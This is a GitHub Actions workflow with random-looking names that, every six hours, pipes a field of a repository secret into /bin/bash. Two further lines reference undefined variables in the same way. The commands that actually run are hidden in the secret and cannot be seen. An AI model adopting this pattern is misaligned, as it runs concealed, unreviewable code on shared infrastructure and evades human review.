name: xianguanghefeng

on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'
jobs:  # 11357
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianguanghefeng
        env:
          sq4853: ${{ secrets.sq4853 }}
        run: |
          echo $sq4853 | jq -r .adfi50 | /bin/bash
          echo $lllw4 | jq -r .dgbxp6021 | /bin/bash
          echo $zgrmu7481 | jq -r .iqtw1111 | /bin/bash

